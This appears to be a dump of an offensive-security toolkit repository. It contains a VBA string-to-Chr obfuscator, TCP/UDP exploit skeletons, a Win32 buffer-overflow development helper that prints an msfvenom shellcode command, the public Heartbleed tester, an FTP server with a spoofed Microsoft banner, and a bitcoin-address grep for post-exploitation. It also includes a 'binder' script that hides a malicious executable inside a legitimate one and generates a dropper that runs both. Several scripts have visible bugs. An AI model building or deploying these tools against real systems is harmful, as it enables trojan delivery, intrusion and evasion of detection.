32 | Chr(64) @
33 | Chr(65) A
34 | Chr(66) B
35 | Chr(67) C
36 | Chr(68) D
37 | Chr(69) E
38 | Chr(70) F
39 | Chr(71) G
40 | Chr(72) H
41 | Chr(73) I
42 | Chr(74) J
43 | Chr(75) K
44 | Chr(76) L
45 | Chr(77) M
46 | Chr(78) N
47 | Chr(79) O
48 | Chr(80) P
49 | Chr(81) Q
50 | Chr(82) R
51 | Chr(83) S
52 | Chr(84) T
53 | Chr(85) U
54 | Chr(86) V
55 | Chr(87) W
56 | Chr(88) X
57 | Chr(89) Y
58 | Chr(90) Z
59 | Chr(91) [
60 | Chr(92) \
61 | Chr(93) ]
62 | Chr(94) ^
63 | Chr(32) _
64 | Chr(96) `
65 | Chr(97) a
66 | Chr(98) b
67 | Chr(99) c
68 | Chr(100) d
69 | Chr(101) e
70 | Chr(102) f
71 | Chr(103) g
72 | Chr(104) h
73 | Chr(105) i
74 | Chr(106) j
75 | Chr(107) k
76 | Chr(108) l
77 | Chr(109) m
78 | Chr(110) n
79 | Chr(111) o
80 | Chr(112) p
81 | Chr(113) q
82 | Chr(114) r
83 | Chr(115) s
84 | Chr(116) t
85 | Chr(117) u
86 | Chr(118) v
87 | Chr(119) w
88 | Chr(120) x
89 | Chr(121) y
90 | Chr(122) z
91 | Chr(123) {
92 | Chr(124) |
93 | Chr(125) }
94 | Chr(126) ~
95 | 


--------------------------------------------------------------------------------
/exploit-development/obfuscators/vba_str_to_chr/conv_str.sh:
--------------------------------------------------------------------------------
 1 | # still some bugs that need to get worked out in this, but almost have it
 2 | # Need to sort out space characters
 3 | # Need to figure out why it's tacking on a '+' at the end
 4 | # The space not being handled properly and the + being tacked on at the end are related.
 5 | # wc -m counts the space characters, but the for loop is ignorning the space characters for some reason
 6 | read -p "String to convert: " conv_string;
 7 | 
 8 | str_count=$(echo $conv_string | wc -m)
 9 | counter=1
10 | outstring="exec = Command + "
11 | 
12 | for testchar in $(echo $conv_string | fold -w1); do
13 | #for testchar in $(echo $conv_string); do
14 | #for testchar in $conv_string; do
15 | 	newchr=$(egrep "(Chr)\(.{1,3}\).[$testchar]" chr_table.txt | awk '{print $1}')
16 | 	counter=$((counter+1))
17 | 	# Handle space characters
18 | 	#if [[ $testchar == "\ " ]]
19 | 	#then
20 | 		#newchr="Chr(32)"
21 | 	#fi
22 | 	
23 | 	outstring+=$newchr
24 | 
25 | 	if [[ $(expr $counter % 50) -eq 0 ]]
26 | 	then
27 | 		outstring+="\nexec = exec "
28 | 	fi
29 | 
30 | 	if [[ $counter -ne $str_count ]] 
31 | 	then
32 | 		outstring+=" + "
33 | 	fi
34 | done
35 | 
36 | echo -e "\nOutput\n====================================\n"
37 | 
38 | echo -e $outstring
39 | 


--------------------------------------------------------------------------------
/exploit-development/tcp_exploit_skeleton.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | # TCP Exploit Skeleton
 3 | # Und3rf10w 
 4 | import socket
 5 | from sys import exit,argv
 6 | 
 7 | if len(argv) < 2:
 8 | 	print  "UNDEF-TODO: TCP Exploit Skeleton"
 9 | 	print "Usage: %s <Target IP Address/hostname> <Target Port>" % str(argv[0])
10 | 	exit(0)
11 | 
12 | # Buffer Goes here
13 | buffer""
14 | 
15 | try:
16 | 	print "Attacking %s:%s" % (str(argv[1]),int(argv[2]))
17 | 	s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
18 | 	connect=s.connect((str(argv[1]),int(argv[2])))
19 | 	# This next part depends on whatever the RFC is for what you're trying to 
20 | 	# exploit. Up to you to put the 'string' in the right place. Be sure to
21 | 	# receive bytes after sending anything.
22 | 	s.recv(1024) # Grab the banner, do not remove
23 | 	s.send(string + "\r\n") # Sends your evil buffer as 'string'
24 | 	s.send('QUIT\r\n') # Replace 'QUIT' with whatever ends your session
25 | 	s.close()
26 | except:
27 | 	print "ERROR: socket() failed"
28 | 	exit(1)
29 | 
30 | 


--------------------------------------------------------------------------------
/exploit-development/udp_exploit_skeleton.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | # UDP Exploit Skeleton
 3 | # Und3rf10w 
 4 | import socket
 5 | from sys import exit,argv
 6 | 
 7 | if len(argv) < 2:
 8 | 	print  "UNDEF-TODO: UDP Exploit Skeleton"
 9 | 	print "Usage: %s <Target IP Address/hostname> <Target Port>" % str(argv[0])
10 | 	exit(0)
11 | 
12 | # evil buffer here
13 | buf = ""
14 | 
15 | try:
16 | 	print "Attacking %s:%s" % (str(argv[1]),int(argv[2]))
17 | 	s=socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
18 | 	# This next part depends on whatever the RFC is for what you're trying to 
19 | 	# exploit. Up to you to put the 'string' in the right place.
20 |         string = ""
21 |         s.sendto(string, (str(argv[1]), int(argv[2]))) # Sends your evil buffer as 'string' to host:port
22 | except:
23 | 	print "ERROR: socket() failed"
24 | 	exit(1)
25 | 
26 | 


--------------------------------------------------------------------------------
/exploit-development/win32/binders/poor_mans_binder.py:
--------------------------------------------------------------------------------
  1 | # This runs on windows only at this time
  2 | # Would eventually like to make it cross platform (pyinstaller instead of py2exe)
  3 | # A lot of this code was "inspired" by veil-evasion
  4 | # Und3rf10w
  5 | 
  6 | import base64, random, string, sys, os, argparse, re
  7 | 
  8 | desc = "Relatively simple binder intended to be incredibly lightweight. Assumes payload is already a compiled exe that will execute as a separate process. Provided the benefit of leaving the original executeable 'intact', allowing it to pass any signature checks made at RUNTIME. Emphasis on RUNTIME."
  9 | parser = argparse.ArgumentParser(prog='simple_binder', usage=sys.argv[0] + ' [options]', description=desc)
 10 | parser.add_argument('-t', "--template", type=str, help="Base file to use")
 11 | parser.add_argument('-m', "--virus", type=str, help="Malicious EXE to use")
 12 | args = parser.parse_args()
 13 | 
 14 | 
 15 | if not args.template or not args.virus:
 16 | 	parser.print_help()
 17 | 	exit()
 18 | 
 19 | template_file = args.template
 20 | virus_file = args.virus
 21 | 
 22 | # Totally stolen straight from veil-evasion
 23 | def randomString(length=-1):
 24 | 	"""
 25 | 	Returns random string of "length" characters.
 26 | 	If no length is specified, resulting string is between 6 and 15 characters.
 27 | 	"""
 28 | 	if length == -1: length = random.randrange(6,16)
 29 | 	random_string = ''.join(random.choice(string.ascii_letters) for x in  range(length))
 30 | 	return random_string
 31 | 
 32 | # Get and encode the template file
 33 | with open(template_file, "rb") as templateOpen:
 34 | 	encodedTemplate = base64.b64encode(templateOpen.read())
 35 | 
 36 | # Get and encode the malicious file
 37 | with open(virus_file, "rb") as virusOpen:
 38 | 	encodedVirus = base64.b64encode(virusOpen.read())
 39 | 
 40 | def outputPrep():
 41 | 	with open('exploit.py', "w+") as outputprePrep:
 42 | 		outputprePrep.write("import base64,os,sys\n")
 43 | 		# randomize variable names
 44 | 		base_exe_location = randomString()
 45 | 		base_temp = randomString()
 46 | 		base_encoded = randomString()
 47 | 		virus_exe_location = randomString()
 48 | 		virus_exe_name = randomString()
 49 | 		virus_encoded = randomString()
 50 | 		virus_temp = randomString()
 51 | 		# write exploit.py
 52 | 		outputprePrep.write("%s = \"%s\"\n" %(base_encoded,encodedTemplate))
 53 | 		outputprePrep.write("%s = os.getenv('TEMP') + \"\\\%s\"\n" % (base_exe_location,template_file))
 54 | 		outputprePrep.write("with open(%s, 'wb+') as %s:\n" %(base_exe_location, base_temp))
 55 | 		outputprePrep.write("\t%s.write(base64.b64decode(%s))\n" %(base_temp,base_encoded))
 56 | 		outputprePrep.write("\t%s.close()\n\n" %(base_temp))
 57 | 		outputprePrep.write("os.startfile(%s)\n" %(base_exe_location))
 58 | 		outputprePrep.write("%s = os.getenv('TEMP') + \"\\\%s.exe\"\n" %(virus_exe_location,virus_exe_name))
 59 | 		outputprePrep.write("%s = \"%s\"\n" %(virus_encoded,encodedVirus))
 60 | 		outputprePrep.write("with open(%s, 'wb+') as %s:\n" %(virus_exe_location,virus_temp))
 61 | 		outputprePrep.write("\t%s.write(base64.b64decode(%s))\n" %(virus_temp,virus_encoded))
 62 | 		outputprePrep.write("\t%s.close()\n\n" %(virus_temp))
 63 | 		outputprePrep.write("os.startfile(%s)\n" %(virus_exe_location))
 64 | 		outputprePrep.write("sys.exit(0)")
 65 | 		outputprePrep.close()
 66 | 
 67 | outputPrep()
 68 | templateOpen.close()
 69 | virusOpen.close()
 70 | 
 71 | # Building the construction script
 72 | def runmebatPrep():
 73 | 	with open('runme.bat', "w+") as runmebatprePrep:
 74 | 		runmebatprePrep.write("rem Batch Script for compiling python code into an executable\n") 
 75 | 		runmebatprePrep.write("rem on windows with py2exe\n")
 76 | 		runmebatprePrep.write("rem Usage: Drop into your Python folder and click, or anywhere if Python is in your system path\n\n")
 77 | 		runmebatprePrep.write("python setup.py py2exe\n")
 78 | 		runmebatprePrep.write("cd dist\n")
 79 | 		runmebatprePrep.write("move exploit.exe ../\n")
 80 | 		runmebatprePrep.write("cd ..\n")
 81 | 		runmebatprePrep.write("rmdir /S /Q build\n")
 82 | 		runmebatprePrep.write("rmdir /S /Q dist\n")
 83 | 		runmebatprePrep.close()
 84 | 
 85 | runmebatPrep()
 86 | 
 87 | # Supporting file for py2exe
 88 | def setupfilePrep():
 89 | 	with open('setup.py', "w+") as setupfileprePrep:
 90 | 		setupfileprePrep.write("from distutils.core import setup\n")
 91 | 		setupfileprePrep.write("import py2exe, sys, os\n\n")
 92 | 		setupfileprePrep.write("setup(\n")
 93 | 		setupfileprePrep.write("\toptions = {'py2exe': {'bundle_files': 1}},\n")
 94 | 		setupfileprePrep.write("\tzipfile = None,\n")
 95 | 		setupfileprePrep.write("\twindows=['exploit.py']\n")
 96 | 		setupfileprePrep.write(")\n")
 97 | 		setupfileprePrep.close()
 98 | 
 99 | setupfilePrep()
100 | 
101 | # TODO: 
102 | #	* Automatically execute runme.bat
103 | #	* Package all files in a folder for easy dist
104 | 
105 | exit()


--------------------------------------------------------------------------------
/exploit-development/win32/buffer-overflows/win32-buffer-overflow-development-and-exploitation-skeleton.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/python
  2 | # @Und3rf10w - 20150618
  3 | import socket
  4 | from sys import exit,argv
  5 | from subprocess import Popen, PIPE, STDOUT
  6 | 
  7 | # Defining the connection
  8 | def sendbuffer(host,port,buffer):
  9 | 	try:
 10 | 	        print "\nSending unique evil buffer to %s:%s" % (host,port)
 11 | 	        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 12 | 	        s.connect((host,port))
 13 | 	        # This next part depends on whatever the RFC is for what you're trying to 
 14 | 	        # exploit. Up to you to put the 'string' in the right place. Be sure to
 15 | 	        # receive bytes after sending anything.
 16 | 	        print repr(s.recv(1024)) # Grabs the banner. Do not remove
 17 | 	        s.send(buffer) # Sends the unique string into the buffer
 18 | 		print repr(s.recv(1024))
 19 | 	        print "\nBuffer sent..."
 20 | 		print "Please restart the service and reattach your disassembler now!"
 21 | 	except:
 22 | 	        print "Could not connect to the service"
 23 | 	        exit(2)
 24 | 
 25 | def eip_control_check_prompt(s):
 26 | 	if s == "Yes" or s == "yes" or s == "YES" or s == "y" or s == "Y":
 27 | 		return "Excellent. Continuing to shellcode insertion"
 28 | 	elif s == "No" or s == "no" or s == "NO" or s == "n" or s == "N":
 29 | 		return "ERROR: Something went wrong. You don't have control over EIP"
 30 | 		exit(3)
 31 | 	else:
 32 | 		return "\nPlease type 'yes' or 'no'"
 33 | 
 34 | def increase_buffer_size_prompt(s, *args, **kwargs):
 35 | 	shellcode_space = kwargs.get('shellcode_space', None)
 36 |         if s == "Yes" or s == "yes" or s == "YES" or s == "y" or s == "Y":
 37 |                 return "Increasing size of buffer"
 38 | 		new_space = (350 - shellcode_space) + shellcode_space
 39 | 		return new_space
 40 |         elif s == "No" or s == "no" or s == "NO" or s == "n" or s == "N":
 41 |                 return "Continuing with current shellcode space"
 42 | 		new_space = shellcode_space
 43 | 		return new_space
 44 |         else:
 45 |                 return "\nPlease type 'yes' or 'no'"
 46 | 
 47 | def bad_character_prompt(s, *args, **kwargs):
 48 |         if s == "Yes" or s == "yes" or s == "YES" or s == "y" or s == "Y":
 49 | 		return True
 50 |         elif s == "No" or s == "no" or s == "NO" or s == "n" or s == "N":
 51 |                 return False
 52 |         else:
 53 |                 return "\nPlease type 'yes' or 'no'"
 54 | 
 55 | 
 56 | def return_address_test(return_address, *args, **kwargs):
 57 | 	pivot_address = return_address
 58 | 	buffer = "\x41"*(eip_offset-1) + pivot_address + "\x90"*12 + "\x43"*(available_space - (int(argv[3])- eip_offset) - 12)
 59 | 	sendbuffer(host, port, buffer)
 60 | 	raw_input("Press enter to continue once you have reattached the debugger...")
 61 | 	return_address = pivot_address
 62 | 	return return_address
 63 | 
 64 | def return_address_prompt(s, *args, **kwargs):
 65 | 	if s == "Yes" or s == "yes" or s == "YES" or s == "y" or s == "Y":
 66 |                 return True
 67 |         elif s == "No" or s == "no" or s == "NO" or s == "n" or s == "N":
 68 |                 return False
 69 |         else:
 70 |                 return "\nPlease type 'yes' or 'no'"
 71 | 
 72 | def generate_report(host, port, eip_offset, available_space, bad_characters,return_address):
 73 | 	print "Generating report.. \n"
 74 | 	print """
 75 | 	Service
 76 | 	=======
 77 | 	%s:%d
 78 | 
 79 | 	EIP Offset Location
 80 | 	===================
 81 | 	%s
 82 | 
 83 | 	Bytes Available For Shellcode
 84 | 	=============================
 85 | 	%s
 86 | 
 87 | 	Bad Characters
 88 | 	==============
 89 | 	%s
 90 | 	
 91 | 	Return Address
 92 | 	==============
 93 | 	%s""" %(host, port, eip_offset, available_space, bad_characters,return_address)
 94 | 
 95 | 	print "Modify the following command to generate your shellcode:\n"
 96 | 	print "msfvenom -p <payload> -f c -b '%s' -x 86 --platform windows -e x86/shikata_ga_nai <payload options>" % bad_characters
 97 | 
 98 | # test if script was executed correctly
 99 | if len(argv) < 3:
100 |         print "Assists with buffer overflow exploit development for Win32 binaries"
101 |         print "Usage: %s <Server IP Address or hostname> <service port> <buffer length>" % str(argv[0])
102 |         exit(1)
103 | 
104 | # Create a unique buffer from given buffer length
105 | cmd = '/usr/share/metasploit-framework/tools/pattern_create.rb %d' % int(argv[3])
106 | p = Popen(cmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=STDOUT, close_fds=True)
107 | buffer = str(p.stdout.read())
108 | host = str(argv[1])
109 | port = int(argv[2])
110 | # Send inital buffer
111 | sendbuffer(host,port,buffer)
112 | 
113 | # Receive value of EIP register from user
114 | eip = raw_input('\nInsert the value of EIP at the time of the crash: ') # receive the value of EIP from user
115 | 
116 | # Determine EIP offset
117 | cmd = '/usr/share/metasploit-framework/tools/pattern_offset.rb %s' % eip
118 | p = Popen(cmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=STDOUT, close_fds=True)
119 | print p.stdout.read()
120 | 
121 | # store value of EIP offset
122 | list = offset.split()
123 | eip_offset = int(list[5])
124 | 
125 | # Make new confirmation buffer
126 | buffer = "A"*eip_offset + "B"*4 + "C"*(int(argv[3]) - eip_offset)
127 | 
128 | # Send new buffer
129 | sendbuffer(host,port,buffer)
130 | 
131 | # Ask user if they have control over EIP
132 | prompt = raw_input("Was the value of EIP 42424242 at crash time?: ")
133 | print(eip_control_check_prompt(prompt))
134 | available_space = int(argv[3]) - int(eip_offset)
135 | print "You currently have %d bytes available for shellcode execution" % int(available_space)
136 | 
137 | #initalize new_space
138 | new_space = 0
139 | # Check if enough space available for shellcode, returns new_space
140 | while int(available_space) < 349:
141 | 	print "\nWARN: You don't have enough space for most shellcode"
142 | 	prompt = raw_input("Do you want to try a bigger buffer?: ")
143 | 	shellcode_space = available_space
144 | 	new_space = increase_buffer_size_prompt(prompt,shellcode_space,new_space)
145 | 	buffer = 'A'*eip_offset + 'B'*4 + 'C'*((int(argv[3]) - int(eip_offset)) + int(new_space))
146 | 	sendbuffer(host,port,buffer)
147 | 	raw_input("Press enter to continue once you have reattached the debugger...")
148 | 	available_space = available_space + new_space
149 | 	print "You currently have %d bytes available for shellcode execution" % int(available_space)
150 | 	if available_space >= 349:
151 | 		print "Enough space availabe for shellcode execution"
152 | 		break
153 | 
154 | # Check for presence of bad characters
155 | badchars = (
156 | "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
157 | "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
158 | "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
159 | "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
160 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
161 | "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
162 | "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
163 | "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
164 | "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
165 | "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
166 | "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
167 | "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
168 | "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
169 | "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
170 | "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
171 | "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" )
172 | 
173 | buffer = "A"*eip_offset + "B"*4 + badchars
174 | 
175 | print "Attempting to check for presence of bad characters"
176 | sendbuffer(host,port,buffer)
177 | 
178 | # initalize bad_characters and rem_char
179 | bad_character_test_result = None
180 | bad_characters = ""
181 | rem_char = None
182 | bad_char_flag = 0
183 | prompt = raw_input("Did you encounter any bad characters?: ")
184 | while bad_character_test_result != False:
185 | 	bad_character_test_result = bad_character_prompt(prompt)
186 | 	if bad_char_flag == 1:
187 | 		rem_char = raw_input("\nWhat was the bad character? (\\x00): ")
188 | 		if rem_char != None:
189 | 			badchars.translate(None, rem_char)
190 | 			bad_characters += rem_char
191 | 		print "\nCurrent bad characters: '%s'" %bad_characters
192 | 		buffer = "A"*eip_offset + "B"*4 + badchars
193 | 		print "\nSending new buffer..."
194 | 		sendbuffer(host,port,buffer)
195 | 		raw_input("Press enter to continue once you have reattached the debugger...")
196 | 	bad_char_flag = 1
197 | 	if bad_character_test_result == False:
198 | 		break
199 | 
200 | print "Identified bad characters:\n%s" % str(bad_characters)
201 | 
202 | 
203 | ### Return address identification ###
204 | print "\nNow we just need to identify a return address to redirect the execution from"
205 | 
206 | return_address = None
207 | return_address_flag = 0
208 | return_address_test_result = None
209 | prompt = raw_input("Did that return address work?: ")
210 | while return_address_test_result != True:
211 | 	return_address_dirty = raw_input("Set a new breakpoint on and provide the address to try to return from in little endian format ('0043D0A0' -> '\\xa0\\xd0\\x43\\x00'): ")
212 | 	return_address_clean = return_address_dirty.replace("\\x","")
213 | 	return_address = "\b"+return_address_clean.decode("hex")
214 | 	return_address = return_address_test(return_address)
215 | 	if return_address_flag == 1:
216 | 		return_address_test_result = return_address_prompt(prompt)
217 | 	return_address_flag = 1
218 | 	if return_address_test_result == True:
219 | 		break
220 | 
221 | return_address = return_address
222 | 
223 | # print "INFO: Using %s for the return address" %return_address_dirty.replace("\\x","")
224 | 
225 | generate_report(host, port, str(eip_offset), available_space, str(bad_characters), return_address)
226 | 
227 | print "Your sample exploit code in python is:\n buffer = 'A'*%s + '%s' + shellcode + <nop_sled> + 'C'*(%s-%s-%d-%d-len(shellcode)-<len(nop_sled)>)" %(str(eip_offset), return_address, str(argv[3]), str(eip_offset), len(str(return_address)), len("AUTH "))
228 | 
229 | exit(0)
230 | 


--------------------------------------------------------------------------------
/exploit/web/heartbleed-tester.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python2
  2 | 
  3 | # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
  4 | # The author disclaims copyright to this source code.
  5 | 
  6 | import sys
  7 | import struct
  8 | import socket
  9 | import time
 10 | import select
 11 | import re
 12 | from optparse import OptionParser
 13 | 
 14 | options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
 15 | options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
 16 | options.add_option('-s', '--starttls', action='store_true', default=False, help='Check STARTTLS')
 17 | options.add_option('-d', '--debug', action='store_true', default=False, help='Enable debug output')
 18 | 
 19 | def h2bin(x):
 20 |     return x.replace(' ', '').replace('\n', '').decode('hex')
 21 | 
 22 | hello = h2bin('''
 23 | 16 03 02 00  dc 01 00 00 d8 03 02 53
 24 | 43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
 25 | bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
 26 | 00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
 27 | 00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
 28 | c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
 29 | c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
 30 | c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
 31 | c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
 32 | 00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
 33 | 03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
 34 | 00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
 35 | 00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
 36 | 00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
 37 | 00 0f 00 01 01                                  
 38 | ''')
 39 | 
 40 | hb = h2bin(''' 
 41 | 18 03 02 00 03
 42 | 01 40 00
 43 | ''')
 44 | 
 45 | def hexdump(s):
 46 |     for b in xrange(0, len(s), 16):
 47 |         lin = [c for c in s[b : b + 16]]
 48 |         hxdat = ' '.join('%02X' % ord(c) for c in lin)
 49 |         pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
 50 |         print '  %04x: %-48s %s' % (b, hxdat, pdat)
 51 |     print
 52 | 
 53 | def recvall(s, length, timeout=5):
 54 |     endtime = time.time() + timeout
 55 |     rdata = ''
 56 |     remain = length
 57 |     while remain > 0:
 58 |         rtime = endtime - time.time() 
 59 |         if rtime < 0:
 60 |             return None
 61 |         r, w, e = select.select([s], [], [], 5)
 62 |         if s in r:
 63 |             data = s.recv(remain)
 64 |             # EOF?
 65 |             if not data:
 66 |                 return None
 67 |             rdata += data
 68 |             remain -= len(data)
 69 |     return rdata
 70 |         
 71 | 
 72 | def recvmsg(s):
 73 |     hdr = recvall(s, 5)
 74 |     if hdr is None:
 75 |         print 'Unexpected EOF receiving record header - server closed connection'
 76 |         return None, None, None
 77 |     typ, ver, ln = struct.unpack('>BHH', hdr)
 78 |     pay = recvall(s, ln, 10)
 79 |     if pay is None:
 80 |         print 'Unexpected EOF receiving record payload - server closed connection'
 81 |         return None, None, None
 82 |     print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
 83 |     return typ, ver, pay
 84 | 
 85 | def hit_hb(s):
 86 |     s.send(hb)
 87 |     while True:
 88 |         typ, ver, pay = recvmsg(s)
 89 |         if typ is None:
 90 |             print 'No heartbeat response received, server likely not vulnerable'
 91 |             return False
 92 | 
 93 |         if typ == 24:
 94 |             print 'Received heartbeat response:'
 95 |             hexdump(pay)
 96 |             if len(pay) > 3:
 97 |                 print 'WARNING: server returned more data than it should - server is vulnerable!'
 98 |             else:
 99 |                 print 'Server processed malformed heartbeat, but did not return any extra data.'
100 |             return True
101 | 
102 |         if typ == 21:
103 |             print 'Received alert:'
104 |             hexdump(pay)
105 |             print 'Server returned error, likely not vulnerable'
106 |             return False
107 | 
108 | def main():
109 |     opts, args = options.parse_args()
110 |     if len(args) < 1:
111 |         options.print_help()
112 |         return
113 | 
114 |     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
115 |     print 'Connecting...'
116 |     sys.stdout.flush()
117 |     s.connect((args[0], opts.port))
118 | 
119 |     if opts.starttls:
120 |         re = s.recv(4096)
121 |         if opts.debug: print re
122 |         s.send('ehlo starttlstest\n')
123 |         re = s.recv(1024)
124 |         if opts.debug: print re
125 |         if not 'STARTTLS' in re:
126 |             if opts.debug: print re
127 |             print 'STARTTLS not supported...'
128 |             sys.exit(0)
129 |         s.send('starttls\n')
130 |         re = s.recv(1024)
131 |     
132 |     print 'Sending Client Hello...'
133 |     sys.stdout.flush()
134 |     s.send(hello)
135 |     print 'Waiting for Server Hello...'
136 |     sys.stdout.flush()
137 |     while True:
138 |         typ, ver, pay = recvmsg(s)
139 |         if typ == None:
140 |             print 'Server closed connection without sending Server Hello.'
141 |             return
142 |         # Look for server hello done message.
143 |         if typ == 22 and ord(pay[0]) == 0x0E:
144 |             break
145 | 
146 |     print 'Sending heartbeat request...'
147 |     sys.stdout.flush()
148 |     s.send(hb)
149 |     hit_hb(s)
150 | 
151 | if __name__ == '__main__':
152 |     main()
153 | 


--------------------------------------------------------------------------------
/file-transfers/ftp/small_ftp_server.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | # Small and quick FTP daemon used to quickly transfer files via FTP
 4 | # requires pyftpdlib
 5 | # pip install pyftpdlib
 6 | 
 7 | # @Und3rf10w - 20150627
 8 | 
 9 | # imports
10 | from pyftpdlib.authorizers import DummyAuthorizer
11 | from pyftpdlib.handlers import FTPHandler
12 | from pyftpdlib.servers import FTPServer
13 | from sys import argv
14 | import argparse
15 | 
16 | # Required command line switches
17 | parser = argparse.ArgumentParser(prog=str(argv[0]), usage='%(prog)s [options]', description='Small and quick FTP server daemon used to quickly transfer files via FTP')
18 | parser.add_argument('-u', help='Username that can connect to the FTP server (full rights)', required=True, dest='user')
19 | parser.add_argument('-p', help='Password for user that can connect to the FTP server', required=True, dest='password')
20 | parser.add_argument('-d', help='Directory to be used for FTP root', required=True, dest='ftproot')
21 | 
22 | # Optional command line switches
23 | parser.add_argument('-P', help='Port to run FTP instance on', default=21, dest='port')
24 | parser.add_argument('-a', help='Allow anonymous (read-only) logins', action='store_true', default='store_false', dest='anon')
25 | parser.add_argument('-H', help='IP/hostname to bind FTP instance to', default='0.0.0.0', dest='host')
26 | 
27 | # parse arguments
28 | args = parser.parse_args()
29 | argsdict = vars(args)
30 | user = argsdict['user']
31 | password = argsdict['password']
32 | ftproot = argsdict['ftproot']
33 | port = argsdict['port']
34 | anon = argsdict['anon']
35 | host = argsdict['host']
36 | 
37 | 
38 | # Begin authorization
39 | authorizer = DummyAuthorizer()
40 | authorizer.add_user(user, password, ftproot, perm="elradfmw")
41 | if anon == True:
42 | 	authorizer.add_anonymous(ftproot, perm="elm")
43 | 
44 | # Initalize the FTP Handler
45 | handler = FTPHandler
46 | handler.authorizer = authorizer
47 | handler.banner = "Microsoft FTP Service" # because stealth
48 | 
49 | # Define the FTP Service
50 | server = FTPServer((host, int(port)), handler)
51 | 
52 | # Run until ^C
53 | server.serve_forever()
54 | 


--------------------------------------------------------------------------------
/post-exploit/linux/find_bitcoin_addresses.sh:
--------------------------------------------------------------------------------
1 | egrep "^[13][a-km-zA-HJ-NP-Z0-9]{26,33}$" . -R 2>/dev/null
2 | 


--------------------------------------------------------------------------------